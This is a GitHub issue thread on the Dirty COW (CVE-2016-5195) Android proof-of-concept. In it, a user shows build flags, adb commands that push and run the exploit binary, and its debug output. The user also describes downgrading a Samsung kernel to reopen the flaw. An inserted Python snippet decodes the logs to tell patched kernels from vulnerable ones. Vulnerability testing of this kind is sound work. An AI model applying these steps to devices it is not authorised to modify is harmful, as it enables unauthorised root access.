timwr / CVE-2016-5195

CVE-2016-5195 (dirtycow/dirtyc0w) proof of concept for Android

HELP: Note 5 AT&T Nov. Sec. Patch. (I executed dirtycow, have photo evidence, but how?) #58

Closed droidvoider closed 7 years ago

droidvoider commented 7 years ago

dirtycow always says it works for me and quickly but it has only worked once. I am passionately trying to rediscover how I did it. (I patched /system/build.prop and it showed in recovery!)

Two possibilities of how. First possibility: I just got done flashing the wrong files in Download Mode, repeatedly getting fails. I tried rooting files that almost finished, rooting files for 5.11 that did finish but didn't boot. Finally I put just the AP file back (excluding BL+CP+CSC files) and it booted, then I executed.. (did I crash the November 1 2016 update, or get at the kernel somehow on a locked bootloader?)

Second possibility: I accidentally deleted the directory containing the version I used. Maybe I found a version for Samsung or compiled it differently?? (I was trying tons of dirtycow compilations.) CVE-2016-5195 = SVE-2016-7504 (double patched?) Google says the fix is called CVE-2016-5195, patched 11-05-2016; however my security patch level is Nov 1st, 2016. The Samsung SVE-2016-7504 is stated to be included in November's patches, and there are 14 patches in that set. AT&T N920AUCS4CPK1 has a note about 14 patches from Samsung, the exact number. (So I seem to be patched if I follow the logic, even though Google responded on 11/05/2016, but I dunno how to confirm what's in this Nov 1 2016 security patch in the PK1 firmware.)

Samsung Note 5 (Exynos 7420), here's what I'm building with.

ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=arm64-v8a APP_PLATFORM=android-23

Android.mk:

LOCAL_PATH := $(call my-dir)
include $(CLEAR_VARS)
LOCAL_SRC_FILES := dirtycow.c
LOCAL_MODULE := dirtycow
LOCAL_LDFLAGS   += -llog
LOCAL_CFLAGS    += -DDEBUG
include $(BUILD_EXECUTABLE)

(I also try these flags, separately, added before the include $(BUILD_EXECUTABLE) line.. I am learning C on Android, I like it.)

LOCAL_CFLAGS    += -fPIE
LOCAL_LDFLAGS   += -fPIE -pie

timwr commented 7 years ago

Can you try make test? Does it work?

droidvoider commented 7 years ago

Thanks, I guess not.

ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=arm64-v8a APP_PLATFORM=android-23
make[1]: Entering directory '/home/mm/Downloads/timwr-CVE-2016-5195-master'
[arm64-v8a] Compile        : dirtycow <= dirtycow.c
[arm64-v8a] Compile        : dirtycow <= dcow.c
[arm64-v8a] Executable     : dirtycow
[arm64-v8a] Install        : dirtycow => libs/arm64-v8a/dirtycow
[arm64-v8a] Compile        : run-as <= dirtycow.c
[arm64-v8a] Compile        : run-as <= run-as.c
[arm64-v8a] Executable     : run-as
[arm64-v8a] Install        : run-as => libs/arm64-v8a/run-as
make[1]: Leaving directory '/home/mm/Downloads/timwr-CVE-2016-5195-master'
adb push libs/arm64-v8a/dirtycow /data/local/tmp/dcow
[100%] /data/local/tmp/dcow
adb shell 'chmod 777 /data/local/tmp/dcow'
adb push test.sh /data/local/tmp/test.sh
[100%] /data/local/tmp/test.sh
adb shell 'chmod 777 /data/local/tmp/dcow'
adb shell 'chmod 777 /data/local/tmp/test.sh'
adb shell '/data/local/tmp/test.sh'
-rw-rw-rw- shell    shell          18 2017-02-21 21:15 test
-rwxrwxrwx shell    shell         367 2017-01-23 01:20 test.sh
-r--r--r-- shell    shell          18 2017-02-21 21:15 test2
adb shell '/data/local/tmp/dcow /data/local/tmp/test /data/local/tmp/test2'
dcow /data/local/tmp/test /data/local/tmp/test2
[*] size 18
[*] mmap 0x7fb729a000
[*] currently 0x7fb729a000=76746f6e72756f79
[*] using /proc/self/mem method
[*] madvise = 0x7fb729a000 18
[*] madvise = 0 610265
[*] /proc/self/mem 761778 42321
[*] exploited 0 0x7fb729a000=626172656e6c7576
adb shell 'cat /data/local/tmp/test2'
yournotvulnerable
adb shell 'cat /data/local/tmp/test2' | xxd
00000000: 796f 7572 6e6f 7476 756c 6e65 7261 626c  yournotvulnerabl
00000010: 650d 0a                                  e..
droidvoider commented 7 years ago

DIRTYCOW NOW SAYS VULNERABLE ON THE TEST!!!! woo!!! I flashed boot.img from the previous firmware!

My phone reboots if I try to alter things in /data/data/app-name, but it doesn't if I patch /system/bin/run-as.. Guess I could patch the reboot command to 0000000 (LAUGH)

This makes me so happy:

adb shell '/data/local/tmp/dcow /data/local/tmp/test /data/local/tmp/test2'
dcow /data/local/tmp/test /data/local/tmp/test2
[*] size 18
[*] mmap 0x7fae7e6000
[*] currently 0x7fae7e6000=76746f6e72756f79
[*] using /proc/self/mem method
[*] madvise = 0x7fae7e6000 18
[*] madvise = 0 41
[*] /proc/self/mem 486 27
[*] exploited 0 0x7fae7e6000=626172656e6c7576
adb shell 'cat /data/local/tmp/test2'
vulnerable!!!!!!!
adb shell 'cat /data/local/tmp/test2' | xxd
00000000: 7675 6c6e 6572 6162 6c65 2121 2121 2121  vulnerable!!!!!!
00000010: 210d 0a                                  !..

edit: I hate when people say they did something, and if they only mentioned how, you could finally sleep!! I used Heimdall on Ubuntu 16.01. It's a little bit of a read to get it installed, but after that you can use sudo apt-get install heimdall-frontend 'I think, or close to that command'.

  1. Take the pit file from the CSC image file of your firmware.. (I will likely post this on xda for the Note 5 PK1)
  2. Take boot.img from the PJ1 version, or whatever you are attempting.
  3. Load pit, add, browse for image, flash, profit.

edit: You can downgrade your kernel from PK1 down to PE6 to play with stuff. Unlike the one baseband rollback, your kernel binaries won't match secure storage, a lot of stuff. Wifi in/out.. I didn't observe any elevated temps, but it was turning my mic off/on off/on and wigging the hell out. So I didn't try anything except verifying cow, then I restored my boot.img; it took a while for logcat to clean up, but it did. (why would you do this.. hey! don't do this)
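The two test runs above (the patched PK1 kernel and the downgraded boot.img) look identical up to the `[*] exploited` line; only the contents of the read-only target file differ. The following added example, not part of the repository or the thread, decodes those debug lines and shows why the file, not the log, is the real verdict. It assumes the `currently`/`exploited` lines print the first 8 bytes of the mapping as a native-endian unsigned long (consistent with the values posted), and the sample logs and file contents are constructed from the thread.

```python
import re
import struct

# Constructed from the thread: PoC debug output on the patched PK1 kernel,
# followed by the bytes `cat test2 | xxd` showed afterwards.
PATCHED_LOG = """[*] size 18
[*] mmap 0x7fb729a000
[*] currently 0x7fb729a000=76746f6e72756f79
[*] using /proc/self/mem method
[*] madvise = 0x7fb729a000 18
[*] madvise = 0 610265
[*] /proc/self/mem 761778 42321
[*] exploited 0 0x7fb729a000=626172656e6c7576
"""
PATCHED_FILE = b"yournotvulnerable\r\n"

# Constructed from the second run on the downgraded (unpatched) boot.img.
VULN_LOG = """[*] currently 0x7fae7e6000=76746f6e72756f79
[*] exploited 0 0x7fae7e6000=626172656e6c7576
"""
VULN_FILE = b"vulnerable!!!!!!!\r\n"

WORD_RE = re.compile(r"\[\*\] (currently|exploited) (?:\d+ )?0x[0-9a-f]+=([0-9a-f]{1,16})")


def decode_word(hex_word: str) -> bytes:
    """Turn the printed unsigned long back into file bytes. AArch64 is
    little-endian, so the low byte of the number is the file's first byte."""
    return struct.pack("<Q", int(hex_word, 16))


def words_from_log(log: str) -> dict:
    """Map 'currently' / 'exploited' to the decoded 8-byte prefix they show."""
    return {m.group(1): decode_word(m.group(2)) for m in WORD_RE.finditer(log)}


def verdict(log: str, target_after: bytes) -> str:
    """The 'exploited' line only proves the process's private mapping changed,
    which happens on every kernel. The kernel is vulnerable only if the
    read-only file on disk now starts with those same bytes."""
    words = words_from_log(log)
    if target_after.startswith(words["exploited"]):
        return "vulnerable"
    if target_after.startswith(words["currently"]):
        return "not vulnerable (write hit the private COW copy only)"
    return "inconclusive"
```

Run `verdict(PATCHED_LOG, PATCHED_FILE)` and `verdict(VULN_LOG, VULN_FILE)` to see the two outcomes; the decoded prefixes are `yournotv` and `vulnerab` in both runs, which is why the log alone cannot tell them apart.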

timwr commented 7 years ago

:) great stuff @droidvoider